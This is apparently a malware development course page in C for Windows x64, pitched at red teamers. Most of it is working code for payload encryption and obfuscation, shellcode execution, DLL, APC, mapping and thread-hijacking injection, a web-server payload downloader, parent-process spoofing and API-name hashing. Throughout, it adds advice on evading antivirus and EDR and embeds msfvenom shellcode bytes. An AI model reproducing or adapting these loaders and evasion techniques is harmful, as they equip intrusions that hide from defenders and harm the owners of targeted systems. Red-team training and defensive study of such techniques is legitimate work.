Malware Development Research

Malware Development Fundamentals

QA210 — From Windows API foundations to advanced EDR bypass techniques

33 topics | Language: C | Platform: Win32 | Architecture: x64

Figure: Malware Development Lifecycle (MDLC). Development (build and refine) → Testing (bug hunting) → Offline AV/EDR (local testing) → Online AV/EDR (cloud testing) → IoC Analysis (indicators) → loop back to step 1.

Overview

Malware is software specifically designed to carry out malicious actions such as unauthorized access to a computer or stealing sensitive data. The term "malware" is often associated with illegal or criminal activity, but it can also be used by ethical hackers such as penetration testers and red team members during authorized security assessments of an organization.

From an offensive security perspective, testers typically have three main options when it comes to the types of tools used in an assessment: Open-Source Tools (OSTs) — which are quickly identified by security vendors; purchasing commercial tools — closed-source, with a better chance of bypassing security solutions; or developing custom tools — which have not been analyzed or identified by security vendors, providing the greatest advantage for the attacking team. This is why knowledge of malware development is crucial for a successful offensive security assessment.

Why Choose C?

Any programming language can be used to create malware — Python, PowerShell, C#, C++, Go. However, C stands out for the following reasons: low-level languages are harder to reverse engineer; they do not require prerequisites on the target system (unlike Python, which needs an interpreter); the resulting file size is compact; and they provide fine-grained control when interacting with the operating system. High-level languages are more abstracted from the OS, less efficient with memory, and offer less overall control due to the abstraction of complex functionality. In contrast, low-level languages like C provide a way to interact with the operating system at a detailed level and give developers more freedom when working with the system.

Malware Development Lifecycle (MDLC)

The Malware Development Lifecycle (MDLC) is a customized version of the SDLC, consisting of 5 main phases: Development — start building or refining functionality; Testing — perform testing to detect bugs; Offline AV/EDR Testing — run the developed malware against as many security products as possible offline; Online AV/EDR Testing — run against cloud-connected security products; and IoC Analysis — analyze the malware and extract Indicators of Compromise. After step 5, the process loops back to step 1 for continuous improvement.

Warning

Online AV/EDR testing may result in your malware being submitted to security vendors and added to their databases. Always test offline first, and exercise caution when testing online.

Required Tools

Tool | Purpose
Visual Studio | Primary C/C++ development environment
x64dbg | Open-source debugger for Windows x64/x86 binaries
PE-Bear | PE structure analysis, view imports/exports
Process Hacker 2 | View and control processes, loaded DLLs, memory regions
Msfvenom | Shellcode payload generation
VMware / VirtualBox | Virtualization environment for testing
Windows SDK | Windows development headers and libraries

Foundational Knowledge

Windows Architecture

A processor in the Windows operating system can operate in two different modes: User Mode and Kernel Mode. Applications run in user mode and operating system components run in kernel mode. When an application wants to perform a task such as creating a file, it cannot do so directly — the only entity that can complete the task is the kernel, so applications must follow a process called the Function Call Flow (FCF).

The main components in the Windows architecture include: User Processes — programs executed by the user (Notepad, Chrome); Subsystem DLLs — DLLs containing API functions called by user processes (kernel32.dll, user32.dll, advapi32.dll); Ntdll.dll — a system-wide DLL at the lowest layer of user mode that creates the transition from user mode to kernel mode (commonly referred to as the Native API or NTAPI); and Executive Kernel — the Windows Kernel that calls drivers and other modules in kernel mode.

Function Call Flow (FCF)

The FCF process begins when a user application calls a WinAPI function (e.g., CreateFile in kernel32.dll). This DLL then calls the equivalent NTAPI function (NtCreateFile in ntdll.dll). Next, ntdll.dll executes an assembly instruction (sysenter on x86 or syscall on x64) to transition to kernel mode. In kernel mode, the NtCreateFile function is called, which interacts with drivers and modules to complete the work.

Direct NTAPI Invocation

Applications can call NTAPI functions (the functions exported by ntdll.dll) directly, without going through the WinAPI, which is largely a wrapper layer over the Native API. Using the Native API directly is harder, however, because most of it is not officially documented by Microsoft.

Virtual Memory & Paging

In modern operating systems, a process does not address physical RAM directly. Instead, it uses virtual addresses, which the system translates to physical addresses. Virtual memory is built on paging: memory is divided into pages, typically 4 KB each. A page can be in one of three states: Free (not in use and available for allocation), Reserved (a range of addresses set aside for later use, with no storage behind it yet), or Committed (backed by physical storage, either RAM or the paging file).

Important page protection options: PAGE_NOACCESS (disables all access to the page), PAGE_EXECUTE_READWRITE (allows read, write, and execute — highly discouraged), PAGE_READONLY (allows read-only access).

Memory Protection

Two important memory protection mechanisms: DEP (Data Execution Prevention) — prevents code execution in memory regions that do not have the execute flag; and ASLR (Address Space Layout Randomization) — randomly arranges the address space positions of key data areas, including the base of the executable and the positions of the stack, heap, and libraries.

Windows API

The Windows API provides many specialized data types beyond common ones like int and float. Key data types include:

Data Type | Description | Example
HANDLE | Handle to an object (file, process, event) | HANDLE hFile = CreateFile(...)
DWORD | Unsigned 32-bit integer | DWORD dwBytesRead;
LPVOID | Pointer to any type | LPVOID pMemory = VirtualAlloc(...)
LPSTR / LPWSTR | ANSI / Unicode string pointer | LPSTR buf = "Hello";
BOOL | Represents TRUE or FALSE | BOOL bResult = DeleteFile(...)
HMODULE | Handle to a module (DLL/EXE) | HMODULE hMod = GetModuleHandle(...)

ANSI vs Unicode

Most Windows API functions that take strings come in two versions, with names ending in "A" (ANSI) or "W" (wide, UTF-16). For example, CreateFileA takes an LPCSTR (a string of 8-bit characters), while CreateFileW takes an LPCWSTR (a string of 16-bit characters). The storage sizes differ accordingly: char str[] = "qa210" occupies 6 bytes, and wchar_t str[] = L"qa210" occupies 12 bytes (2 bytes per character, including the null terminator).

In/Out Parameters & Error Handling

The Windows API uses IN (input) and OUT (output) parameters. OUT parameters are typically passed by pointer. For error handling, use GetLastError() for WinAPI and NTSTATUS with the NT_SUCCESS() macro for NTAPI. Always check return values when calling WinAPI — for example, CreateFileW returns INVALID_HANDLE_VALUE on failure.

Portable Executable (PE) Format

PE is the executable file format on Windows, including EXE, DLL, and SYS. Understanding PE structure is a critical foundation for malware development because it allows you to understand how malware is loaded into memory, how imports/exports work, and how to perform injection techniques.

+======================================================+
|                     PE Structure                     |
+======================================================+
| DOS Header (IMAGE_DOS_HEADER)                        |
|   +-- e_magic: "MZ"                                  |
|   +-- e_lfanew -> offset to NT Headers               |
+------------------------------------------------------+
| DOS Stub                                             |
+------------------------------------------------------+
| NT Headers (IMAGE_NT_HEADERS)                        |
|   +-- Signature: "PE\0\0"                            |
|   +-- File Header (IMAGE_FILE_HEADER)                |
|   |     +-- Machine, NumberOfSections                |
|   |     +-- SizeOfOptionalHeader                     |
|   +-- Optional Header (IMAGE_OPTIONAL_HEADER)        |
|         +-- AddressOfEntryPoint                      |
|         +-- ImageBase                                |
|         +-- SectionAlignment / FileAlignment         |
|         +-- DataDirectory[16]                        |
|               +-- [0] Export Table                   |
|               +-- [1] Import Table                   |
|               +-- [2] Resource Table                 |
|               +-- ...                                |
+------------------------------------------------------+
| Section Headers                                      |
|   +-- .text  (code, IMAGE_SCN_MEM_EXECUTE)           |
|   +-- .data  (global/static init vars, R/W)          |
|   +-- .rdata (read-only data, const)                 |
|   +-- .rsrc  (resources)                             |
|   +-- .reloc (relocations)                           |
+======================================================+

Important PE components: DOS Header starts with the magic "MZ" (0x5A4D) and contains e_lfanew — the offset to NT Headers; File Header contains machine info, number of sections, and timestamp; Optional Header contains AddressOfEntryPoint (entry point), ImageBase (base address), and DataDirectory — an array of 16 entries pointing to important data tables like Export Table, Import Table, and Resource Table.

Dynamic-Link Library (DLL)

A DLL is a library containing code and data that can be used by multiple programs simultaneously. DLLs have an entry point DllMain that is called when the DLL is loaded/unloaded:

c
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Runs when DLL is loaded into a process
            break;
        case DLL_THREAD_ATTACH:
            // Runs when a new thread is created
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            // Runs when DLL is unloaded
            break;
    }
    return TRUE;
}

To export a function from a DLL, use __declspec(dllexport). There are two ways to load a DLL: Load-time dynamic linking (linked at compile time using a .lib file) and Run-time dynamic linking (linked at runtime using LoadLibraryA/W + GetProcAddress). Run-time linking is more common in malware because it does not leave traces in the IAT at compile time.

AV Malware Detection Mechanisms

Understanding how AV detects malware is the foundation for building bypass techniques. The main mechanisms include:

Static / Signature Detection
AV matches the program against a list of known rules (YARA rules). A signature is a sequence of bytes or strings that uniquely identifies malware. For example: shellcode starting with FC 48 83 E4 F0 E8 C0 00 00 00 can be identified as an msfvenom payload. Bypass: avoid hardcoding values, encrypt payloads, retrieve values dynamically.
Hashing Detection
AV stores hash values (MD5, SHA256) of known malware in a database. Bypass is extremely simple: changing even a single byte in the file will completely change the hash value.
Heuristic Detection
Experience-based detection, including: Static Heuristics (decompile and compare code against known malware) and Dynamic Heuristics (run in a sandbox and analyze suspicious behavior). More complex to bypass than simple signature detection.
Sandbox / Behavior-based Detection
Sandbox analysis examines file behavior during execution in an isolated environment. Behavior-based monitoring looks for suspicious indicators while malware is running — loading DLLs, calling specific APIs, connecting to the internet. Example: allocating memory + downloading shellcode + writing to memory + executing in sequence = malicious behavior.
API Hooking & IAT Checking
EDRs use API hooking to intercept and analyze parameters of commonly abused APIs in real time. IAT Checking: AV examines the Import Address Table to determine which APIs a program uses — for example, seeing CreateFileA + CryptHashData may flag the program as potential ransomware.

Payload Placement

As a malware developer, you have several choices for where to store the payload within a PE file. Depending on this choice, the payload will reside in a different section of the PE file, affecting read/write capabilities and the level of detection by AV.

.data Section

The .data section contains initialized global and static variables. This section is readable and writable (R/W), making it suitable for encrypted payloads that need to be decrypted at runtime. Payloads stored in global or local variables will be placed in .data depending on compiler settings.

c
// .data saved payload - read/write, suitable for encrypted payloads
unsigned char Data_RawData[] = {
    0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2
    // ... msfvenom shellcode
};

int main() {
    printf("[i] Data_RawData var : 0x%p \n", Data_RawData);
    // Can modify directly since .data is R/W
    return 0;
}

.rdata Section

Variables declared with the const keyword are stored in .rdata (read-only data). The "r" indicates the data is read-only — any attempt to modify it will cause an access violation. However, depending on the compiler, .data and .rdata may be merged, or even merged into .text. Use .rdata for payloads that do not need in-place decryption, but if in-place decryption is required, you must change the memory protection first.

Tip

Payloads can also be stored in any custom section using the pragma directive: #pragma section(".mysec", execute, read, write). This helps avoid signature detection based on inspecting .data/.rdata sections.

Payload Encryption

Payload Encryption is a technique used to hide code within a malicious file, making detection more difficult for security solutions. Encryption helps malware remain undetected for longer periods. However, the more data that is encrypted in a file, the higher the file's entropy — which can cause security solutions to flag the file as suspicious. The three most common encryption algorithms in malware development are XOR, RC4, and AES.

XOR Encryption

XOR is the simplest encryption algorithm, suitable for small payloads. Three levels of increasing complexity:

c
// Method 1: XOR with a single byte key (vulnerable to brute force)
VOID XorByOneKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ bKey;
    }
}

// Method 2: XOR with key + index (increases key space)
VOID XorByiKeys(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ (bKey + i);
    }
}

// Method 3: XOR with a multi-byte key array (hardest to crack)
VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize,
                   IN PBYTE bKey, IN SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0;
        }
        pShellcode[i] = pShellcode[i] ^ bKey[j];
    }
}

Recommendation

XOR should be used for small payloads (e.g., obfuscating strings). For larger payloads, use AES or RC4 for stronger security and resistance to brute force attacks.

RC4 Encryption

RC4 is a fast, efficient, and bidirectional cryptographic algorithm — the same function is used for both encryption and decryption. RC4 uses the Key Scheduling Algorithm (KSA) to initialize the state array, then uses the Pseudo-Random Generation Algorithm (PRGA) to encrypt data.

c
// RC4 Key Scheduling Algorithm (KSA)
void rc4_init(unsigned char* key, int keylen, unsigned char* S) {
    int i, j = 0;
    for (i = 0; i < 256; i++) {
        S[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
    }
}

// RC4 Pseudo-Random Generation Algorithm (PRGA)
void rc4_crypt(unsigned char* S, unsigned char* data, int datalen) {
    int i = 0, j = 0, k;
    for (k = 0; k < datalen; k++) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
        // Generate keystream byte
        int t = (S[i] + S[j]) % 256;
        data[k] ^= S[t];
    }
}
NEVER hardcode keys!

Never hardcode keys directly in source code. Keys can be discovered during reverse engineering. All of the following key representations are detectable: unsigned char* key = "qa210";, unsigned char key[] = {0x71, 0x61, 0x32, ...};, or unsigned char key[] = {'q','a','2','1','0'};. Instead, generate keys at runtime or use a derivation method.

AES Encryption

AES (Advanced Encryption Standard) is the strongest symmetric encryption algorithm of the three, suitable for large payloads. The tiny-aes-c library provides a lightweight implementation of AES-128/192/256 suitable for malware development. AES uses a block cipher with a 16-byte block size and supports operating modes such as CBC, CTR, and ECB.

c
// Using tiny-aes-c to encrypt/decrypt payloads
#include "aes.h"

struct AES_ctx ctx;
uint8_t key[16] = { /* derived at runtime */ };
uint8_t iv[16]  = { /* derived at runtime */ };

// Initialize AES context with key and IV
AES_init_ctx_iv(&ctx, key, iv);

// Decrypt payload (AES-CBC mode)
AES_CBC_decrypt_buffer(&ctx, encryptedPayload, payloadSize);

Payload Obfuscation

Obfuscation is a technique for hiding payloads by transforming them into different formats (IPv4, IPv6, MAC addresses, UUIDs) to avoid signature detection. The payload is converted into strings that appear legitimate, and is only restored to its original form at runtime. These techniques help reduce entropy and make payloads look like normal data during static analysis.

IPv4/IPv6 Fuscation

Transforms the payload into IPv4 or IPv6 address strings. Every 4 bytes of shellcode are represented as one IPv4 address octet. For example: 0xFC4883E4 becomes 252.72.131.228. For IPv6, every 16 bytes of shellcode become one IPv6 address, allowing obfuscation of larger data per entry.

c
// IPv4 Deobfuscation - convert IPv4 strings back to shellcode
BOOL Ipv4Deobfuscation(IN CHAR* Ipv4Array[], IN SIZE_T NmbrOfElements,
                       OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
    PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 4);
    if (!pBytes) return FALSE;

    for (SIZE_T i = 0; i < NmbrOfElements; i++) {
        // inet_addr converts "A.B.C.D" to 4 bytes
        *(DWORD*)(pBytes + i * 4) = inet_addr(Ipv4Array[i]);
    }

    *ppDAddress = pBytes;
    *pDSize = NmbrOfElements * 4;
    return TRUE;
}

MAC Fuscation

Similar to IPv4, but transforms the payload into MAC addresses. Every 6 bytes of shellcode become one MAC address. The sscanf function with format string "%02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx" is used to parse MAC addresses back into bytes.

UUID Fuscation

Every 16 bytes of shellcode are represented as a UUID (e.g., FC4883E4-F0E8-C000-0000-4151-41505251). Use UuidFromStringA from the WinAPI to convert a UUID string back into 16 binary bytes. This is a powerful technique because UUIDs look completely legitimate in source code and have a fixed size of 16 bytes per entry.

c
// UUID Deobfuscation
BOOL UuidDeobfuscation(IN CONST RPC_CSTR UuidArray[], IN SIZE_T NmbrOfElements,
                       OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
    PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 16);
    if (!pBytes) return FALSE;

    for (SIZE_T i = 0; i < NmbrOfElements; i++) {
        // UuidFromStringA converts UUID string to 16 bytes
        if (RPC_S_OK != UuidFromStringA((RPC_CSTR)UuidArray[i],
                (UUID*)(pBytes + i * 16))) {
            return FALSE;
        }
    }

    *ppDAddress = pBytes;
    *pDSize = NmbrOfElements * 16;
    return TRUE;
}

Local Payload Execution

Shellcode Injection (Local)

The process of executing shellcode in the current process consists of the following main steps: allocate a memory region with VirtualAlloc, write the payload to that region, change memory protection if needed, create a thread to execute, and free the memory when done.

c
// Local Shellcode Injection - basic process
BOOL RunShellcode(IN PBYTE pShellcode, IN SIZE_T sSizeOfShellcode) {
    // 1. Allocate RW memory region
    PVOID pAddress = VirtualAlloc(NULL, sSizeOfShellcode,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_READWRITE);
    if (!pAddress) return FALSE;

    // 2. Write payload to memory region
    memcpy(pAddress, pShellcode, sSizeOfShellcode);

    // 3. Change protection to RX (executable)
    DWORD dwOldProtection = 0;
    if (!VirtualProtect(pAddress, sSizeOfShellcode,
                        PAGE_EXECUTE_READ, &dwOldProtection))
        return FALSE;

    // 4. Execute payload using CreateThread
    HANDLE hThread = CreateThread(NULL, 0,
                                   (LPTHREAD_START_ROUTINE)pAddress,
                                   NULL, 0, NULL);
    if (!hThread) return FALSE;

    // 5. Wait for thread to complete
    WaitForSingleObject(hThread, INFINITE);

    // 6. Free memory
    VirtualFree(pAddress, 0, MEM_RELEASE);
    CloseHandle(hThread);
    return TRUE;
}
RWX is a red flag

Using PAGE_EXECUTE_READWRITE (RWX) is a major red flag for AV/EDR. Always use the RW → Write → RX flow instead of directly allocating RWX memory. Allocating RWX memory is one of the most suspicious behaviors that security solutions monitor.

DLL Injection (Process Injection)

DLL Injection is the technique of inserting a DLL into a running process. The process: open a handle to the target process with OpenProcess, allocate memory in the target process with VirtualAllocEx, write the DLL path with WriteProcessMemory, and create a remote thread that calls LoadLibraryA using CreateRemoteThread.

c
// DLL Injection into a remote process
BOOL InjectDll(IN DWORD dwPid, IN const char* dllPath) {
    // 1. Open handle to target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (!hProcess) return FALSE;

    // 2. Allocate memory in target process
    SIZE_T sSize = strlen(dllPath) + 1;
    PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
                                     MEM_COMMIT | MEM_RESERVE,
                                     PAGE_READWRITE);
    if (!pAddress) { CloseHandle(hProcess); return FALSE; }

    // 3. Write DLL path to target process
    if (!WriteProcessMemory(hProcess, pAddress, dllPath, sSize, NULL)) {
        CloseHandle(hProcess); return FALSE;
    }

    // 4. Find LoadLibraryA address
    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    pfnLoadLibraryA pLoadLibraryA = (pfnLoadLibraryA)
        GetProcAddress(hKernel32, "LoadLibraryA");

    // 5. Create remote thread calling LoadLibraryA
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                         (LPTHREAD_START_ROUTINE)pLoadLibraryA,
                                         pAddress, 0, NULL);
    if (!hThread) { CloseHandle(hProcess); return FALSE; }

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return TRUE;
}

Shellcode Injection (Remote)

Remote Shellcode Injection is similar to DLL Injection, but instead of writing a DLL path and calling LoadLibraryA, you write shellcode directly into the target process and create a remote thread to execute at the shellcode address. This technique is more flexible because it does not require a DLL file on disk.

Staging

Staging is the technique of storing payloads at an external source (web server, Windows Registry) rather than embedding them directly in the binary. This helps reduce the executable file size, lower entropy, and allows updating payloads without recompiling. Staging is particularly useful when payloads are large or when you need to change payloads between executions.

Web Server Staging

Uses the WinINet API (InternetOpenW, InternetOpenUrlW, InternetReadFile) to download payloads from a remote server. The process: initialize a WinINet session, open the URL, read the data, and close handles. Payload size can be determined dynamically by reading until no more data is available.

c
// Download payload from a web server
BOOL DownloadPayload(IN LPCWSTR url, OUT PBYTE* ppBuffer, OUT SIZE_T* pSize) {
    HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0",
                                          INTERNET_OPEN_TYPE_DIRECT,
                                          NULL, NULL, 0);
    if (!hInternet) return FALSE;

    HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0,
                                        INTERNET_FLAG_SECURE, 0);
    if (!hUrl) { InternetCloseHandle(hInternet); return FALSE; }

    // Dynamic payload size - read until no more data
    DWORD dwBytesRead = 0;
    SIZE_T totalSize = 0;
    BYTE tempBuffer[4096];
    PBYTE pBuffer = NULL;

    while (InternetReadFile(hUrl, tempBuffer, sizeof(tempBuffer), &dwBytesRead)
           && dwBytesRead > 0) {
        pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), 0, pBuffer,
                                      totalSize + dwBytesRead);
        memcpy(pBuffer + totalSize, tempBuffer, dwBytesRead);
        totalSize += dwBytesRead;
    }

    *ppBuffer = pBuffer;
    *pSize = totalSize;

    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);
    return TRUE;
}

Windows Registry Staging

The Windows Registry can be used as a payload storage location. Advantages: no network connection required, payloads are stored persistently on the system. Use RegOpenKeyExW, RegSetValueExW, and RegGetValueW to write and read payloads from the Registry. Conditional compilation (#ifdef) can be used to create two separate binaries: one to stage the payload into the Registry, and one to read and execute it.

Thread Hijacking

Thread Hijacking is a technique that takes control of a running thread to execute malicious code instead of creating a new thread. The main advantage over CreateThread/CreateRemoteThread is that no new thread is created — this helps avoid detection by security solutions that monitor thread creation. The technique works by suspending a thread, changing its context (specifically the instruction pointer RIP/EIP) to point to the shellcode, and then resuming the thread.

Local Thread Hijacking

c
// Local Thread Hijacking
BOOL HijackThread(IN HANDLE hThread, IN PVOID pAddress) {
    // 1. Suspend the thread
    SuspendThread(hThread);

    // 2. Get thread context
    CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
    if (!GetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        return FALSE;
    }

    // 3. Change instruction pointer (RIP on x64)
    ctx.Rip = (DWORD64)pAddress;

    // 4. Set the new thread context
    if (!SetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        return FALSE;
    }

    // 5. Resume thread - will execute from the new address
    ResumeThread(hThread);
    return TRUE;
}

Remote Thread Hijacking

Remote Thread Hijacking applies the same principle but to threads of a different process. Additional step: use CreateToolhelp32Snapshot to enumerate threads of the target process, then select an appropriate thread to hijack. This technique completely avoids calling CreateRemoteThread — an API commonly hooked by EDR.

APC Injection

Asynchronous Procedure Call (APC) is a Windows mechanism that allows code execution in the context of a specific thread. APC Injection leverages this mechanism to insert a payload into a target thread's APC queue. When the thread enters an alertable state (calling SleepEx, WaitForSingleObjectEx, etc.), the APC will be executed.

Standard APC Injection

c
// APC Injection into a remote process
BOOL ApcInjection(IN DWORD dwPid, IN PBYTE pShellcode, IN SIZE_T sSize) {
    // 1. Open target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

    // 2. Allocate and write shellcode
    PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
                                     MEM_COMMIT | MEM_RESERVE,
                                     PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, pAddress, pShellcode, sSize, NULL);

    // 3. Find alertable threads
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te32 = { .dwSize = sizeof(THREADENTRY32) };

    if (Thread32First(hSnapshot, &te32)) {
        do {
            if (te32.th32OwnerProcessID == dwPid) {
                HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE,
                                             te32.th32ThreadID);
                // 4. Queue APC to the thread
                QueueUserAPC((PAPCFUNC)pAddress, hThread, 0);
                CloseHandle(hThread);
            }
        } while (Thread32Next(hSnapshot, &te32));
    }

    CloseHandle(hSnapshot);
    CloseHandle(hProcess);
    return TRUE;
}

Early Bird APC Injection

Early Bird is a variant of APC Injection that executes before the main thread of the process begins running. The process: create a process in a suspended state using CreateProcess with the CREATE_SUSPENDED flag, queue an APC to the main thread, then resume the process. The thread will execute the APC before running the process's main code. This technique is particularly effective because it avoids race conditions — the thread is guaranteed to be in an alertable state when resumed.

Callback Code Execution

Callback Code Execution takes advantage of Windows APIs that accept function pointer callbacks as parameters. Instead of creating a new thread or injecting into another process, malware passes the shellcode address as a callback function to legitimate APIs. When the API is called, it executes the callback — which is the shellcode. This technique is extremely effective because it uses legitimate APIs, does not create new threads, and is difficult to detect through conventional monitoring methods.

c
// Callback Code Execution - using EnumWindows
// Pass shellcode address as the callback
BOOL result = EnumWindows((WNDENUMPROC)pShellcodeAddress, 0);

// Other callback APIs that can be used:
// EnumChildWindows, EnumDesktopWindows, EnumSystemLocalesA
// EnumSystemLocalesW, EnumTimeFormatsA, EnumDesktopWindows
// CreateTimerQueueTimer, EnumUILanguages
// CertEnumSystemStore, EnumSystemGeoID

Advantage

Callback execution does not require CreateThread or CreateRemoteThread, does not modify thread context, and uses completely legitimate Windows APIs. This is one of the stealthiest techniques for executing shellcode.

Mapping Injection

Mapping Injection uses Windows Section objects (shared memory) to inject shellcode into a target process without needing VirtualAllocEx/WriteProcessMemory — two APIs commonly hooked by EDR. This technique uses NtCreateSection, NtMapViewOfSection, and NtUnmapViewOfSection to create a shared memory section, write the payload to a local view, then map it into the target process.

c
// Local Mapping Injection
BOOL MappingInjection(IN PBYTE pShellcode, IN SIZE_T sSize) {
    HANDLE hSection = NULL;
    PVOID pLocalView = NULL;
    PVOID pRemoteView = NULL;
    SIZE_T sViewSize = sSize;

    // 1. Create section object
    NTSTATUS status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
                                        &(LARGE_INTEGER){ .QuadPart = sSize },
                                        PAGE_EXECUTE_READWRITE,
                                        SEC_COMMIT, NULL);

    // 2. Map section into local process (R/W)
    NtMapViewOfSection(hSection, GetCurrentProcess(), &pLocalView, 0, 0,
                       NULL, &sViewSize, ViewUnmap, 0, PAGE_READWRITE);

    // 3. Write shellcode to local view
    memcpy(pLocalView, pShellcode, sSize);

    // 4. Map section into local process with RX (executable)
    NtMapViewOfSection(hSection, GetCurrentProcess(), &pRemoteView, 0, 0,
                       NULL, &sViewSize, ViewUnmap, 0, PAGE_EXECUTE_READ);

    // 5. Execute shellcode
    HANDLE hThread = CreateThread(NULL, 0,
                                   (LPTHREAD_START_ROUTINE)pRemoteView,
                                   NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
    NtUnmapViewOfSection(GetCurrentProcess(), pRemoteView);
    NtClose(hSection);
    CloseHandle(hThread);
    return TRUE;
}

Remote Mapping Injection

The remote variant maps the section object into a target process instead of the local process. Because NtMapViewOfSection is called with the target process handle, neither VirtualAllocEx nor WriteProcessMemory is needed.

Function Stomping Injection

Function Stomping (also known as Function Hooking Overwrite) is a technique that overwrites the content of a legitimate function in a loaded DLL with shellcode. Instead of allocating new memory, it uses existing memory that is already marked as executable. This technique helps bypass security checks that monitor the allocation of new executable memory regions.

The process: load a DLL into the process using LoadLibraryA, find the target function address using GetProcAddress, change the memory protection to RW using VirtualProtect, overwrite the function with shellcode, restore the protection to RX, and execute via a callback or by directly calling the overwritten function.

Target Function Selection Tip

Choose functions that are rarely called during normal operation — for example, functions in rarely-used DLLs. If you choose a frequently-called function (like CreateFileW), the shellcode will execute multiple times unintentionally or cause crashes.

Spoofing

PPID Spoofing (Parent Process ID)

PPID Spoofing changes the parent process of a newly created process, making it appear as if it was launched by a legitimate process (e.g., explorer.exe) rather than the malware. This helps bypass security rules based on parent-child process relationships. The technique uses PROC_THREAD_ATTRIBUTE_LIST and UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify the parent process.

c
// PPID Spoofing - create process with a fake parent process
BOOL CreateSpoofedProcess(IN DWORD dwParentPid, IN LPCWSTR lpCmdLine) {
    // Open handle to the parent process to spoof
    HANDLE hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwParentPid);

    // Initialize STARTUPINFOEX
    STARTUPINFOEXW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.StartupInfo.cb = sizeof(STARTUPINFOEXW);

    // Allocate PROC_THREAD_ATTRIBUTE_LIST
    SIZE_T sAttrListSize = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &sAttrListSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
        HeapAlloc(GetProcessHeap(), 0, sAttrListSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sAttrListSize);

    // Set parent process attribute
    UpdateProcThreadAttribute(si.lpAttributeList, 0,
                               PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                               &hParentProcess, sizeof(HANDLE), NULL, NULL);

    // Create process with spoofed PPID
    CreateProcessW(NULL, (LPWSTR)lpCmdLine, NULL, NULL, FALSE,
                    EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                    &si.StartupInfo, &pi);

    // Cleanup
    DeleteProcThreadAttributeList(si.lpAttributeList);
    CloseHandle(hParentProcess);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}

Process Argument Spoofing

Process Argument Spoofing creates a process with fake command-line arguments (appearing legitimate, such as notepad.exe C:\Windows\Temp\readme.txt), but then overwrites them with the real arguments in memory before the process actually executes. This technique deceives monitoring tools that only read the initial command line.

String Hashing

String Hashing replaces API name strings with their hash values, helping avoid detection through IAT checking and string scanning. Instead of calling GetProcAddress(hModule, "VirtualAlloc"), you calculate the hash of "VirtualAlloc" and find the function with a matching hash in the DLL's Export Table. Common hashing algorithms:

c
// DjB2 Hash Algorithm
DWORD HashStringDjb2A(IN PCHAR String) {
    ULONG Hash = 5381;
    while (*String) {
        Hash = ((Hash << 5) + Hash) + *String;
        String++;
    }
    return Hash;
}

// Jenkins One-At-A-Time 32-bit Hash
DWORD HashStringJenkinsOneAtATime32BitA(IN PCHAR String) {
    DWORD Hash = 0;
    while (*String) {
        Hash += *String;
        Hash += Hash << 10;
        Hash ^= Hash >> 6;
        String++;
    }
    Hash += Hash << 3;
    Hash ^= Hash >> 11;
    Hash += Hash << 15;
    return Hash;
}
